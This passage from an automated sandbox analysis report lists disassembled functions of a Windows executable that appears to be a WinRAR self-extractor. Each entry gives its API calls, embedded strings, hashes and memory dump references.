                                                                                                                                                                            • Instruction ID: a18abe95bd6dadaee6ca97ae8f6f05a65447dc1e0e226dc6b2508fc3d766dfad
                                                                                                                                                                            • Opcode Fuzzy Hash: cc778be26e293ded0f17a75b7e1cdaf81b5dbacd6808c72ed9435fec85c2d80f
                                                                                                                                                                            • Instruction Fuzzy Hash: 48417175D60209AFDF19DFE8E889BEDBBB8AB08314F04401EF500B7241DB7499948F21
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$H_prolog3
                                                                                                                                                                            • String ID: &nbsp;$<br>
                                                                                                                                                                            • API String ID: 1035939448-26742755
                                                                                                                                                                            • Opcode ID: 9258579d173849941fbbd92eafb8fa14e055a352b696bb843b12b91862b1cc43
                                                                                                                                                                            • Instruction ID: bb421f8a6945da7dc2ac68f4332646fdad572d5de292621686c834f1bdc07089
                                                                                                                                                                            • Opcode Fuzzy Hash: 9258579d173849941fbbd92eafb8fa14e055a352b696bb843b12b91862b1cc43
                                                                                                                                                                            • Instruction Fuzzy Hash: 2341A331B212119BCB259F50C88173D7332FF95706F20842AE8059F281EBB199F6CBD9
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_wcslen
                                                                                                                                                                            • String ID: BL&$VL&$`L&
                                                                                                                                                                            • API String ID: 3746244732-1923800042
                                                                                                                                                                            • Opcode ID: 52819a010a43765af44123afcdbd18fbc6ebd06c17bef99951de13157a23886e
                                                                                                                                                                            • Instruction ID: 6262558358f8d0500c0bc6eeae9f7a12ba07d7a3fa020618bd53c1458d78907d
                                                                                                                                                                            • Opcode Fuzzy Hash: 52819a010a43765af44123afcdbd18fbc6ebd06c17bef99951de13157a23886e
                                                                                                                                                                            • Instruction Fuzzy Hash: 98413B71A2010AAFDF04DFA8DD999EE77B9FF09304B104159F851E72A0DB309DA0DB64
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0025FEA7: GetCurrentProcess.KERNEL32(00020008,?), ref: 0025FEB6
                                                                                                                                                                              • Part of subcall function 0025FEA7: GetLastError.KERNEL32 ref: 0025FEE1
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,?), ref: 0025FB23
                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0025FB31
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                                                                            • String ID: .L&$8L&$tL&
                                                                                                                                                                            • API String ID: 1077098981-3905086209
                                                                                                                                                                            • Opcode ID: f055a077e6d30af9dc08c664f4fe07f4507c8aee149ad19e784c8dd340c48baf
                                                                                                                                                                            • Instruction ID: d32a39ced8e6d4bf16eda256c0bb89c4ac0666defa437506b1b648a8590edbe6
                                                                                                                                                                            • Opcode Fuzzy Hash: f055a077e6d30af9dc08c664f4fe07f4507c8aee149ad19e784c8dd340c48baf
                                                                                                                                                                            • Instruction Fuzzy Hash: C421F7B191020AEBDB10CF65E9899EEBBF8FF48315F10452AEC15E3150D734DA59CBA4
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                            • String ID: BL&$LL&$Software\WinRAR SFX$jL&
                                                                                                                                                                            • API String ID: 2427045233-145528788
                                                                                                                                                                            • Opcode ID: eacdbb36c28d2226ce37e72988dcad6050daf42ad1c914bad877e60d52b9108f
                                                                                                                                                                            • Instruction ID: b5e05bb07322ca44466dad0cc4cf5dd9bf3b5c1b7244f07d892ae43d729cdfb4
                                                                                                                                                                            • Opcode Fuzzy Hash: eacdbb36c28d2226ce37e72988dcad6050daf42ad1c914bad877e60d52b9108f
                                                                                                                                                                            • Instruction Fuzzy Hash: 98215C71920219EFDB25DFA4EC89EEEBBB9FF88710F10441AF501A2150D7719AA4CB74
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadBitmapW.USER32(00000065), ref: 002607F5
                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0026081A
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0026084C
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0026086F
                                                                                                                                                                              • Part of subcall function 0025EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00260845,00000066), ref: 0025EBE6
                                                                                                                                                                              • Part of subcall function 0025EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EBFD
                                                                                                                                                                              • Part of subcall function 0025EBD3: LoadResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EC14
                                                                                                                                                                              • Part of subcall function 0025EBD3: LockResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EC23
                                                                                                                                                                              • Part of subcall function 0025EBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00260845,00000066), ref: 0025EC3E
                                                                                                                                                                              • Part of subcall function 0025EBD3: GlobalLock.KERNEL32(00000000), ref: 0025EC4F
                                                                                                                                                                              • Part of subcall function 0025EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0025EC73
                                                                                                                                                                              • Part of subcall function 0025EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0025ECB8
                                                                                                                                                                              • Part of subcall function 0025EBD3: GlobalUnlock.KERNEL32(00000000), ref: 0025ECD7
                                                                                                                                                                              • Part of subcall function 0025EBD3: GlobalFree.KERNEL32(00000000), ref: 0025ECDE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                            • String ID: ]
                                                                                                                                                                            • API String ID: 1797374341-3352871620
                                                                                                                                                                            • Opcode ID: 6446b3b5c7f0601a2868c98cccbc4ab99ec23fb912291e7b9cadaf15736667f3
                                                                                                                                                                            • Instruction ID: 60abcc0e8e21cbdcf1b3b1683eb758e24ca230eb495a2ed8fc509d5ba23912ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 6446b3b5c7f0601a2868c98cccbc4ab99ec23fb912291e7b9cadaf15736667f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 3901F931560216A7DB11AB74AC49B7F367AAFC0B56F060125FD00A72D1DF71CD295AE0
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0026ECE0,00000000,?,0026EC80,00000000,00286F40,0000000C,0026EDD7,00000000,00000002), ref: 0026ED4F
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0026ED62
• FreeLibrary.KERNEL32(00000000,?,?,?,0026ECE0,00000000,?,0026EC80,00000000,00286F40,0000000C,0026EDD7,00000000,00000002), ref: 0026ED85
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• SleepConditionVariableCS.KERNELBASE(?,002662BB,00000064), ref: 00266341
• LeaveCriticalSection.KERNEL32(002960E0,?,?,002662BB,00000064,?,?,?,?,00000000,0027A75D,000000FF), ref: 0026634B
• WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,002662BB,00000064,?,?,?,?,00000000,0027A75D,000000FF), ref: 0026635C
• EnterCriticalSection.KERNEL32(002960E0,?,002662BB,00000064,?,?,?,?,00000000,0027A75D,000000FF), ref: 00266363
Strings
Similarity
• API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
• String ID: `)
• API String ID: 3269011525-3279841111
APIs
  • Part of subcall function 00256C5E: __EH_prolog3_GS.LIBCMT ref: 00256C65
  • Part of subcall function 00256C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00256C9A
• GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002550B3
• GetProcAddress.KERNEL32(002951F8,CryptUnprotectMemory), ref: 002550C3
Strings
Similarity
• API ID: AddressProc$DirectoryH_prolog3_System
• String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
• API String ID: 270589589-1753850145
APIs
Similarity
• API ID: AdjustPointer$_abort
• String ID:
• API String ID: 2252061734-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 0024F3C5
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,0024B749,?,?,?,?,?,?), ref: 0024F450
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 0024F4A7
• SetFileTime.KERNEL32(?,?,?,?), ref: 0024F569
• CloseHandle.KERNEL32(?), ref: 0024F570
Similarity
• API ID: File$Create$CloseH_prolog3_HandleTime
• String ID:
• API String ID: 4002707884-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00272BE9
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00272C0C
  • Part of subcall function 0027040E: RtlAllocateHeap.NTDLL(00000000,0026535E,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?,?,?,?), ref: 00270440
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00272C32
• _free.LIBCMT ref: 00272C45
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00272C54
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• GetLastError.KERNEL32(0026535E,0026535E,?,002701D8,00270451,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?), ref: 0027008E
• _free.LIBCMT ref: 002700C3
• _free.LIBCMT ref: 002700EA
• SetLastError.KERNEL32(00000000,?,0026535E), ref: 002700F7
• SetLastError.KERNEL32(00000000,?,0026535E), ref: 00270100
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3170660625-0
APIs
• _free.LIBCMT ref: 002734C7
  • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
  • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
• _free.LIBCMT ref: 002734D9
• _free.LIBCMT ref: 002734EB
• _free.LIBCMT ref: 002734FD
• _free.LIBCMT ref: 0027350F
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 0026F7DE
  • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
  • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
• _free.LIBCMT ref: 0026F7F0
• _free.LIBCMT ref: 0026F803
• _free.LIBCMT ref: 0026F814
• _free.LIBCMT ref: 0026F825
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
  • Part of subcall function 00251309: __EH_prolog3.LIBCMT ref: 00251310
  • Part of subcall function 00251309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002517FB,?,?,\\?\,6294DA82,?,?,?,00000000,0027A279,000000FF), ref: 00251319
  • Part of subcall function 00251AD1: __EH_prolog3_GS.LIBCMT ref: 00251AD8
  • Part of subcall function 0024F763: __EH_prolog3_GS.LIBCMT ref: 0024F76A
  • Part of subcall function 0024F58B: __EH_prolog3_GS.LIBCMT ref: 0024F592
  • Part of subcall function 0024F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,0024A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0024F5A8
  • Part of subcall function 0024F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024F5EB
• SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00262137
• MoveFileW.KERNEL32(?,?), ref: 002622BE
• MoveFileExW.KERNEL32(?,00000000,00000004), ref: 002622D8
  • Part of subcall function 002514CC: __EH_prolog3_GS.LIBCMT ref: 002514D3
Similarity
• API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
• String ID: .tmp
• API String ID: 1688541384-2986845003
APIs
  • Part of subcall function 0025EBAA: GetDC.USER32(00000000), ref: 0025EBAE
  • Part of subcall function 0025EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0025EBB9
  • Part of subcall function 0025EBAA: ReleaseDC.USER32(00000000,00000000), ref: 0025EBC4
• GetObjectW.GDI32(?,00000018,?), ref: 0025EF65
  • Part of subcall function 0025F1EC: GetDC.USER32(00000000), ref: 0025F1F5
  • Part of subcall function 0025F1EC: GetObjectW.GDI32(?,00000018,?), ref: 0025F224
  • Part of subcall function 0025F1EC: ReleaseDC.USER32(00000000,?), ref: 0025F2BC
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID: ($kJ&
• API String ID: 1061551593-2228923650
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FX6KTgnipP.exe,00000104), ref: 0026EE6A
• _free.LIBCMT ref: 0026EF35
• _free.LIBCMT ref: 0026EF3F
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                            • String ID: C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                            • API String ID: 2506810119-3530599616
                                                                                                                                                                            • Opcode ID: 985f5ac84e552fd72ae3bc6bf59bf64c1746613f660e40bd145fd4f3e7a52e35
                                                                                                                                                                            • Instruction ID: 58a29a63409939bb23d35f47e23575ff5e55c499d94892ee6e388b1a7c17c8d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 985f5ac84e552fd72ae3bc6bf59bf64c1746613f660e40bd145fd4f3e7a52e35
                                                                                                                                                                            • Instruction Fuzzy Hash: F4319F75A24258EFCF21DF99EC8599EBBFCEB85310F1140A6F80897201D7B18E94CB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00269E7B
                                                                                                                                                                            • _abort.LIBCMT ref: 00269F86
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EncodePointer_abort
                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                            • API String ID: 948111806-2084237596
                                                                                                                                                                            • Opcode ID: 94941b5f52cfc19ce63a687a455c0db367ce9c46a1e13e39165c4ceafeb5451a
                                                                                                                                                                            • Instruction ID: 4a0f77f21ccdb39b51d7ea5ce99cb51a8c658e63cc4cee0a61ae3c2e8b9be041
                                                                                                                                                                            • Opcode Fuzzy Hash: 94941b5f52cfc19ce63a687a455c0db367ce9c46a1e13e39165c4ceafeb5451a
                                                                                                                                                                            • Instruction Fuzzy Hash: 49416A7191020AEFCF16DF94CD81AEEBBB9BF48304F254159FA14A7211D73599E0DB50
                                                                                                                                                                            APIs
                                                                                                                                                                            • __fprintf_l.LIBCMT ref: 0025340E
                                                                                                                                                                            • _strncpy.LIBCMT ref: 00253459
                                                                                                                                                                              • Part of subcall function 002589ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,0028E088,?,00000007,002533E2,?,?,00000050,6294DA82), ref: 00258A0A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                            • String ID: $%s$@%s
                                                                                                                                                                            • API String ID: 562999700-834177443
                                                                                                                                                                            • Opcode ID: b832841aeb95f1935ceb10d6589dfbb56b328adf4c27b2abb47816a8c206ee52
                                                                                                                                                                            • Instruction ID: 6ec39a72b19b60e5fe8be41f2b500e649b75de7463ec42897f79049dc73a7688
                                                                                                                                                                            • Opcode Fuzzy Hash: b832841aeb95f1935ceb10d6589dfbb56b328adf4c27b2abb47816a8c206ee52
                                                                                                                                                                            • Instruction Fuzzy Hash: A4219E72A2070EABDB11DEB8CC45EAE7BA8BB05301F040525FE14D7281D771EA69CB64
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0025F8F7
                                                                                                                                                                              • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
                                                                                                                                                                              • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 0025F99F
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 0025F9E1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText$DialogH_prolog3_Window
                                                                                                                                                                            • String ID: ASKNEXTVOL
                                                                                                                                                                            • API String ID: 2321058237-3402441367
                                                                                                                                                                            • Opcode ID: 1f2eeff915d45c7c63047e57dfe834f92ca260f7bfd813aa65e8bb5285bced31
                                                                                                                                                                            • Instruction ID: e82ff0b93e03464ebc0f363a60ee9fd87f6ccecf8b87a5a852d8da82f994d4a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f2eeff915d45c7c63047e57dfe834f92ca260f7bfd813aa65e8bb5285bced31
                                                                                                                                                                            • Instruction Fuzzy Hash: B621A231630515BFCB55EF64DE4AFA937A9BB0A301F104065F9419B2A1C370A979CF29
                                                                                                                                                                            APIs
                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0024FEBD,00000008,00000004,00252D42,?,?,?,?,00000000,0025ABB6,?), ref: 00257484
                                                                                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0024FEBD,00000008,00000004,00252D42,?,?,?,?,00000000), ref: 0025748E
                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0024FEBD,00000008,00000004,00252D42,?,?,?,?,00000000), ref: 0025749E
                                                                                                                                                                            Strings
                                                                                                                                                                            • Thread pool initialization failed., xrefs: 002574B6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                            • String ID: Thread pool initialization failed.
                                                                                                                                                                            • API String ID: 3340455307-2182114853
                                                                                                                                                                            • Opcode ID: 1650fe9dec180560ca6ec558c1ef28962659cd62bc252406dce81e3abe0ab4a5
                                                                                                                                                                            • Instruction ID: 87390786a0791775e461bf9242f6262f72fcf0609a7a1dca624ca608ddb11a18
                                                                                                                                                                            • Opcode Fuzzy Hash: 1650fe9dec180560ca6ec558c1ef28962659cd62bc252406dce81e3abe0ab4a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 231106B1654309AFC3315F76AC889A7FFECEB55745F20082EF5DAC3200D6B059948B64
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                            • API String ID: 0-56093855
